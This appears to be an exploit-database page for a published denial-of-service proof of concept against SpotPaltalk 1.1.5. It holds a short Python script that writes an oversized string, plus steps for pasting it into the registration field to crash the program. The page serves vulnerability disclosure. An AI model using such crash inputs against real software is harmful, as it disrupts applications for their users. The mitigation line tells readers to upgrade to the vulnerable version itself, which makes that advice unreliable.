header-logo
Suggest Exploit
vendor:
SpotPaltalk
by:
Alejandra Sánchez
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SpotPaltalk
Affected Version From: 1.1.5
Affected Version To: 1.1.5
Patch Exists: Yes
Related CWE: N/A
CPE: a:nsauditor:spotpaltalk:1.1.5
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10
2019

SpotPaltalk 1.1.5 – ‘Name/Key’ Denial of Service (PoC)

SpotPaltalk 1.1.5 is vulnerable to a denial of service attack when a maliciously crafted Name/Key field is entered. When the 'OK' button is clicked, the application crashes.

Mitigation:

Upgrade to the latest version of SpotPaltalk 1.1.5 or later.
Source

Exploit-DB raw data:

# -*- coding: utf-8 -*-
# Exploit Title: SpotPaltalk 1.1.5 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotpaltalk_setup.exe
# Version: 1.1.5
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "SpotPaltalk.py", it will create a new file "SpotPaltalk.txt"
# 2.- Copy the text from the generated SpotPaltalk.txt file to clipboard
# 3.- Open SpotPalTalk
# 4.  Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field 
# 6.- Click 'OK'
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("SpotPaltalk.txt", "w")
f.write(buffer)
f.close()